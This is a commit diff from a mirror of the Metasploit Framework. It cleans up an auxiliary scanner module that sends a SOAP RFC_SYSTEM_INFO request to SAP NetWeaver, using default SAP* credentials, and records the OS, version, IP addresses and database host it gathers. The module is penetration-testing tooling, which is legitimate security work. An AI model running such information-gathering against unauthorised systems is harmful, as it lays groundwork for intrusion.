infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

final cleanup

unstable
jvazquez-r7 2012-11-18 00:32:20 +01:00
parent e72946303e
commit a35c640acf
1 changed files with 234 additions and 73 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

195
modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
View File

@ -26,25 +26,32 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC_SYSTEM_INFO', 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering',
'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information. 'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information.
By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker
could obtain the operating system version, SAP version, and real IP address of the server.}, could obtain the operating system version, SAP version, and real IP address of the server.},
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'References' =>
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], [
'License' => BSD_LICENSE [ 'CVE', '2006-6010' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'Author' =>
[
'Agnivesh Sathasivam',
'nmonkee'
],
'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('USERNAME', [false, 'username ', 'SAP*']), Opt::RPORT(8000),
OptString.new('PASSWORD', [false, 'password ', '06071992']), OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('CLIENT', [false, 'client ', '001']), OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('CLIENT', [true, 'Client ', '001']),
], self.class) ], self.class)
register_autofilter_ports([ 8000 ])
end end
def run_host(ip) def run_host(ip)
success = false
client = datastore['CLIENT'] client = datastore['CLIENT']
data = '<?xml version="1.0" encoding="utf-8" ?>' data = '<?xml version="1.0" encoding="utf-8" ?>'
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
@ -76,15 +83,12 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code != 500 and res.code != 200 if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc. # to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!") print_error("[SAP] #{ip}:#{rport} - something went wrong!")
return false return
else
success = true
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("[SAP] #{ip}:#{rport} - Unable to connect") print_error("[SAP] #{ip}:#{rport} - Unable to connect")
return false return
end end
if success
print_status("[SAP] #{ip}:#{rport} - got response") print_status("[SAP] #{ip}:#{rport} - got response")
saptbl = Msf::Ui::Console::Table.new( saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default, Msf::Ui::Console::Table::Style::Default,
@ -104,7 +108,6 @@ class Metasploit4 < Msf::Auxiliary
rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i
rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i
rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i
rfcdatabs = $1 if response =~ /<RFCDATABS>(.*)<\/RFCDATABS>/i
rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i
rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i
rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i
@ -114,8 +117,6 @@ class Metasploit4 < Msf::Auxiliary
rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i
rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i
rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i
rfchost2 = $1 if response =~ /<RFCHOST2>(.*)<\/RFCHOST2>/i
rfcsi_resv = $1 if response =~ /<RFCSI_RESV>(.*)<\/RFCSI_RESV>/i
rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i
saptbl << [ "Release Status of SAP System", rfcsaprl ] saptbl << [ "Release Status of SAP System", rfcsaprl ]
saptbl << [ "RFC Log Version", rfcproto ] saptbl << [ "RFC Log Version", rfcproto ]
@ -143,6 +144,166 @@ class Metasploit4 < Msf::Auxiliary
saptbl << [ "Daylight Saving Time", rfcdayst ] saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s) print(saptbl.to_s)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.release',
:data => "Release Status of SAP System: #{rfcsaprl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.rfc_log',
:data => "RFC Log Version: #{rfcproto}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.kernel',
:data => "Kernel Release: #{rfckernrl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'system.os',
:data => "Operating System: #{rfcopsys}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db.hostname',
:data => "Database Host: #{rfcdbhost}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db_system',
:data => "Central Database System: #{rfcdbsys}"
)
if rfcinttyp == 'LIT'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Little Endian"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Big Endian"
)
end end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.hostname',
:data => "Hostname: #{rfchost}"
)
if rfcflotyp == 'IE3'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IEEE"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IBM/370"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v4',
:data => "IPv4 Address: #{rfcipaddr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v6',
:data => "IPv6 Address: #{rfcipv6addr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.instance',
:data => "System ID: #{rfcsysid}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.rfc.destination',
:data => "RFC Destination: #{rfcdest}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.timezone',
:data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.charset',
:data => "Character Set: #{rfcchartyp}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.daylight_saving_time',
:data => "Daylight Saving Time: #{rfcdayst}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.machine_id',
:data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}"
)
end end
end end